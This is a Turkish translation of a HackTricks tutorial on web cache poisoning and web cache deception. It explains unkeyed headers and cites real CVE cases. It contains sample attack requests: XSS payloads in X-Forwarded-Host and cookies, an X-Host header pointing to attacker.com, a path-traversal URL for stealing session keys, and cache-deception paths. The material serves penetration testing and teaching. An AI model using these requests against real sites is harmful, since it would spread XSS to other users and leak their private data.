20 KiB
Önbellek Zehirlenmesi ve Önbellek Aldatmacası
AWS hackleme konusunda sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
- Resmi PEASS & HackTricks ürünlerini edinin
- PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm** takip edin.**
- Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Fark
Web önbellek zehirlenmesi ile web önbellek aldatmacası arasındaki fark nedir?
- Web önbellek zehirlenmesinde, saldırgan uygulamayı önbelleğe bazı kötü niyetli içerikler depolamaya zorlar ve bu içerik önbellekten diğer uygulama kullanıcılarına sunulur.
- Web önbellek aldatmacasında, saldırgan uygulamayı başka bir kullanıcıya ait hassas içerikleri önbelleğe depolamaya zorlar ve ardından bu içeriği önbellekten alır.
Önbellek Zehirlenmesi
Önbellek zehirlenmesi, istemci tarafı önbelleğini manipüle etmeyi amaçlayarak istemcileri beklenmeyen, kısmi veya saldırganın kontrolü altındaki kaynakları yüklemeye zorlar. Etki derecesi, kirletilmiş yanıtın yalnızca önbelleğin kirletilme süresi boyunca sayfayı ziyaret eden kullanıcılara sunulması nedeniyle etkilenen sayfanın popülerliğine bağlıdır.
Önbellek zehirlenmesi saldırısının gerçekleştirilmesi birkaç adımı içerir:
- Anahtarlanmamış Girişlerin Tanımlanması: Bu, önbelleğe alınması için gerekli olmasa da sunucu tarafından döndürülen yanıtı değiştirebilen parametrelerdir. Bu girişlerin tanımlanması, önbelleği manipüle etmek için sömürülebileceği için önemlidir.
- Anahtarlanmamış Girişlerin Sömürülmesi: Anahtarlanmamış girişleri tanımladıktan sonra, bir sonraki adım bu parametreleri nasıl kötüye kullanacağınızı belirlemeyi içerir, böylece saldırganın yararına sunucunun yanıtını değiştirebilir.
- Zehirli Yanıtın Önbelleğe Alınmasının Sağlanması: Son adım, manipüle edilmiş yanıtın önbelleğe alındığından emin olmaktır. Bu şekilde, önbelleğin zehirlendiği süre zarfında etkilenen sayfaya erişen herhangi bir kullanıcı kirletilmiş yanıtı alacaktır.
Keşif: HTTP başlıklarını kontrol edin
Genellikle bir yanıtın önbelleğe alındığında buna işaret eden bir başlık olacaktır, bu başlıklara dikkat etmeniz gereken başlıkları bu yazıda kontrol edebilirsiniz: HTTP Önbellek başlıkları.
Keşif: 400 kodunu önbelleğe alma
Eğer yanıtın önbelleğe alındığını düşünüyorsanız, kötü bir başlıkla istek göndermeyi deneyebilirsiniz, bu da bir durum kodu 400 ile yanıtlanmalıdır. Sonra isteği normal olarak erişmeyi deneyin ve yanıtın 400 durum kodu olduğunu gördüğünüzde, zayıf olduğunu bilirsiniz (ve hatta bir DoS gerçekleştirebilirsiniz).
Kötü yapılandırılmış bir başlık sadece \:
olabilir.
Not: Bazen bu tür durum kodları önbelleğe alınmaz, bu test işe yaramaz olabilir.
Keşif: Anahtarlanmamış girişleri tanımlayın ve değerlendirin
Param Miner kullanarak sayfanın yanıtını değiştirebilecek parametreleri ve başlıkları brute-force yöntemiyle belirleyebilirsiniz. Örneğin, bir sayfa, istemciye betiği oradan yüklemesi için X-Forwarded-For
başlığını kullanıyor olabilir:
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
Zararlı bir yanıtı arka uç sunucudan çıkarın
Belirlenen parametre/başlık ile kontrol edin, nasıl temizlendiğini ve nerede yansıtıldığını veya yanıtı nasıl etkilediğini kontrol edin. Herhangi bir şekilde kötüye kullanabilir misiniz (XSS gerçekleştirebilir veya sizin tarafınızdan kontrol edilen bir JS kodu yükleyebilir misiniz? DoS gerçekleştirebilir misiniz?...)
Yanıtı önbelleğe alın
Kötüye kullanılabilecek sayfayı belirledikten sonra, hangi parametre/başlık'ı kullanacağınızı ve nasıl kötüye kullanacağınızı belirledikten sonra, sayfayı önbelleğe almanız gerekmektedir. Önbelleğe alınmaya çalıştığınız kaynağa bağlı olarak, bu biraz zaman alabilir, birkaç saniye boyunca denemeler yapmanız gerekebilir.
Yanıtta bulunan X-Cache
başlığı, isteğin önbelleğe alınmadığında miss
değerine sahip olabileceği ve önbelleğe alındığında hit
değerine sahip olabileceği için oldukça faydalı olabilir.
Cache-Control
başlığı da kaynağın önbelleğe alınıp alınmadığını ve kaynağın bir sonraki sefer ne zaman önbelleğe alınacağını bilmek için ilginçtir: Cache-Control: public, max-age=1800
Başka bir ilginç başlık ise Vary
. Bu başlık genellikle önbellek anahtarı olarak işlenen ek başlıkları belirtmek için kullanılır, normalde anahtar olmayan başlıklar olarak kabul edilir. Bu nedenle, kullanıcı hedef aldığı kurbanın User-Agent
'ını biliyorsa, o belirli User-Agent
'ı kullanan kullanıcılar için önbelleği zehirleyebilir.
Önbellekle ilgili bir başka başlık ise Age
. Bu, nesnenin proxy önbelleğinde kaç saniye boyunca bulunduğunu tanımlar.
Bir isteği önbelleğe alırken, kullanacağınız başlıklara dikkat edin çünkü bunlardan bazıları beklenmedik şekilde anahtar olarak kullanılabilir ve kurbanın aynı başlığı kullanması gerekebilir. Her zaman farklı tarayıcılar kullanarak bir Önbellek Zehirlenmesini test edin ve çalışıp çalışmadığını kontrol edin.
Sömürü Örnekleri
En kolay örnek
X-Forwarded-For
gibi bir başlık yanıtta temizlenmeden yansıtılıyor.
Temel bir XSS yükü gönderebilir ve önbelleği zehirleyebilirsiniz, böylece sayfaya erişen herkes XSS olacaktır:
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
Web önbellek zehirlenmesini kullanarak çerez işleme açıklarını sömürme
Çerezler ayrıca bir sayfanın yanıtında da yansıtılabilir. Örneğin bir XSS oluşturmak için bunu istismar edebilirseniz, kötü niyetli önbellek yanıtını yükleyen birkaç istemcide XSS'i sömürebilirsiniz.
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
API anahtarını çalmak için yol gezinimini kullanarak önbellek zehirlenmesi
Bu yazıda açıklandığı gibi, https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123
gibi bir URL ile bir OpenAI API anahtarının çalınabilmesinin mümkün olduğu çünkü /share/*
ile eşleşen her şey, Cloudflare'ın URL'yi normalize etmeden önbelleğe alınacaktır, bu da isteğin web sunucusuna ulaştığında yapıldı.
Web önbellek zehirlenmesi açıklarını sömürmek için birden fazla başlık kullanma
Bazen bir önbelleği kötüye kullanabilmek için birkaç anahtarsız girişi sömürmeniz gerekebilir. Örneğin, X-Forwarded-Host
'u sizin kontrol ettiğiniz bir alan adına ve X-Forwarded-Scheme
'i http
olarak ayarlarsanız, bir Açık yönlendirme bulabilirsiniz. Eğer sunucu tüm HTTP isteklerini HTTPS'ye yönlendiriyorsa ve yönlendirme için alan adı olarak X-Forwarded-Scheme
başlığını kullanıyorsa, yönlendirmenin nereye yapıldığını kontrol edebilirsiniz.
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
Sınırlı Vary
başlığı ile sömürme
Eğer X-Host
başlığının, bir JS kaynağını yüklemek için alan adı olarak kullanıldığını ve yanıtta bulunan Vary
başlığının User-Agent
'ı işaret ettiğini tespit ettiyseniz, kurbanın User-Agent'ını dışa aktarmak ve bu kullanıcı ajanını kullanarak önbelleği zehirlemek için bir yol bulmanız gerekecektir:
GET / HTTP/1.1
Host: vulnerbale.net
User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
HTTP İsteği Kaçırarak HTTP Önbellek Zehirlenmesini Sömürme
HTTP İsteği Kaçırarak Web Önbellek Zehirlenmesini Gerçekleştirmek hakkında buradan bilgi edinin.
Web Önbellek Zehirlenmesi için Otomatik Testler
Web Önbellek Zafiyet Tarayıcısı web önbellek zehirlenmesi için otomatik testler yapmak için kullanılabilir. Birçok farklı teknik destekler ve yüksek derecede özelleştirilebilir.
Örnek kullanım: wcvs -u example.com
Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Zafiyetli Örnekler
Apache Trafik Sunucusu (CVE-2021-27577)
ATS, URL içindeki parçayı kaldırmadan iletmiş ve önbellek anahtarını sadece ana bilgisayar, yol ve sorgu kullanarak oluşturmuştur (parçayı yok sayarak). Bu nedenle, /#/../?r=javascript:alert(1)
isteği, arka uca /#/../?r=javascript:alert(1)
olarak gönderilmiş ve önbellek anahtarı içinde yük bulunmamış, yalnızca ana bilgisayar, yol ve sorgu bulunmuştur.
GitHub CP-DoS
İçerik türü başlığında kötü bir değer göndermek, önbelleğe alınmış bir 405 yanıtını tetiklemiştir. Önbellek anahtarı çerez içerdiği için yalnızca kimlik doğrulaması yapılmamış kullanıcılara saldırı yapmak mümkün olmuştur.
GitLab + GCP CP-DoS
GitLab, statik içeriği depolamak için GCP kovalarını kullanmaktadır. GCP Kovaları, x-http-method-override
başlığını desteklemektedir. Bu nedenle, x-http-method-override: HEAD
başlığını göndermek ve önbelleği zehirlemek ve boş bir yanıt gövdesi döndürmek mümkün olmuştur. Ayrıca PURGE
yöntemini de destekleyebilir.
Rack Ara Yazılımı (Ruby on Rails)
Ruby on Rails uygulamalarında genellikle Rack ara yazılımı kullanılmaktadır. Rack kodunun amacı, x-forwarded-scheme
başlığının değerini almak ve isteğin şeması olarak ayarlamaktır. x-forwarded-scheme: http
başlığı gönderildiğinde, aynı konuma yönlendirilen bir 301 yönlendirmesi gerçekleşir, bu da potansiyel olarak bir hizmet Reddi (DoS) oluşturabilir. Ayrıca, uygulama X-forwarded-host
başlığını kabul edebilir ve kullanıcıları belirtilen ana bilgisayara yönlendirebilir. Bu davranış, saldırganın sunucusundan JavaScript dosyalarını yüklemesine neden olabilir ve güvenlik riski oluşturabilir.
403 ve Depolama Kovaları
Cloudflare önceden 403 yanıtlarını önbelleğe almıştır. Yanlış Yetkilendirme başlıkları ile S3 veya Azure Depolama Bloklarına erişmeye çalışmak, önbelleğe alınan bir 403 yanıtına neden olmuştur. Cloudflare 403 yanıtlarını önbelleğe almaktan vazgeçmiş olsa da, bu davranış diğer proxy hizmetlerinde hala mevcut olabilir.
Anahtarlı Parametreler Enjekte Etme
Önbellekler genellikle önbellek anahtarında belirli GET parametrelerini içerir. Örneğin, Fastly'nin Varnish'i isteklerde size
parametresini önbelleğe almıştır. Ancak, URL kodlanmış bir sürümü (örneğin, siz%65
) yanlış bir değerle birlikte gönderildiğinde, önbellek anahtarı doğru size
parametresini kullanarak oluşturulur. Ancak, arka uç, URL kodlanmış parametreyi işler. İkinci size
parametresini URL kodlamak, önbellek tarafından atlanmasına ve arka uç tarafından kullanılmasına neden olmuştur. Bu parametreye 0 değeri atamak, önbelleğe alınabilir bir 400 Hatalı İstek hatası sonucunu doğurmuştur.
Kullanıcı Ajanı Kuralları
Bazı geliştiriciler, sunucu yükünü yönetmek için FFUF veya Nuclei gibi yüksek trafikli araçların kullanıcı ajanlarıyla eşleşen istekleri engeller. İronik bir şekilde, bu yaklaşım önbellek zehirlenmesi ve DoS gibi zafiyetlere neden olabilir.
Yasadışı Başlık Alanları
RFC7230, başlık adlarında kabul edilebilir karakterleri belirtmektedir. Belirtilen tchar aralığının dışındaki karakterleri içeren başlıklar ideal olarak bir 400 Hatalı İstek yanıtı tetiklemelidir. Uygulamada sunucular her zaman bu standartlara uymamaktadır. Akamai gibi, geçersiz karakterler içeren başlıkları ileterek ve cache-control
başlığı mevcut olmadığı sürece herhangi bir 400 hatasını önbelleğe alarak, istismar edilebilir bir model belirlenmiştir. Geçersiz bir karakter içeren bir başlık göndermek, örneğin \
, önbelleğe alınabilir bir 400 Hatalı İstek hatası sonucunu doğurmuştur.
Yeni başlıklar bulma
https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6
Önbellek Aldatmacası
Önbellek Aldatmacasının amacı, istemcilerin duyarlı bilgileriyle birlikte önbelleğe kaydedilecek kaynakları yüklemesini sağlamaktır.
Öncelikle .css, .js, .png gibi uzantıların genellikle önbelleğe kaydedilmesi için ayarlandığını unutmayın. Bu nedenle, www.example.com/profile.php/nonexistent.js
'ye erişirseniz, önbellek muhtemelen yanıtı saklayacaktır çünkü .js uzantısını görür. Ancak, uygulama www.example.com/profile.php/ içinde saklanan duyarlı kullanıcı içeriğiyle yeniden oynuyorsa, diğer kullanıcılardan bu içerikleri çalabilirsiniz.
Test edilecek diğer şeyler:
- www.example.com/profile.php/.js
- www.example.com/profile.php/.css
- www.example.com/profile.php/test.js
- www.example.com/profile.php/../test.js
- www.example.com/profile.php/%2e%2e/test.js
.avif
gibi daha az bilinen uzantıları kullanın
Bu yazıda çok açık bir örnek bulabilirsiniz: https://hackerone.com/reports/593712.
Örnekte, http://www.example.com/home.php/non-existent.css gibi mevcut olmayan bir sayfa yüklerseniz, önceki kullanıcıların duyarlı bilgilerini içeren http://www.example.com/home.php içeriği geri dönecek ve önbellek sunucusu sonucu kaydedecektir.
Ardından, saldırgan, kendi tarayıcısında http://www.example.com/home.php/non-existent.css'e erişebilir ve önceki kullanıcıların gizli bilgilerini gözlemleyebilir.
Önbellek proxy'sinin dosyaları içerik türüne göre değil, dosya uzantısına göre önbelleğe alacak şekilde ayarlanmış olması gerektiğini unutmayın (.css). Örneğin, http://www.example.com/home.php/non-existent.css önbelleğe alınmış bir text/html
içerik türüne sahip olacak ve beklenen .css dosyası için bir text/css
mime türüne sahip olmayacaktır.
HTTP İsteği Kaçırarak Web Önbellek Aldatmaları Saldırıları Gerçekleştirmek hakkında buradan bilgi edinin.
Otomatik Araçlar
- toxicache: Web önbellek zehirlenmesi zafiyetlerini bulmak ve birden fazla enjeksiyon tekniğini test etmek için Golang tarayıcı.
Referanslar
- https://portswigger.net/web-security/web-cache-poisoning
- https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
- https://hackerone.com/reports/593712
- https://youst.in/posts/cache-poisoning-at-scale/
- https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
- https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/
Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Sıfırdan kahramana kadar AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Family koleksiyonumuzu keşfedin, özel NFT'lerimiz
- 💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm takip edin.**
- Hacking püf noktalarınızı paylaşarak PR'ler göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.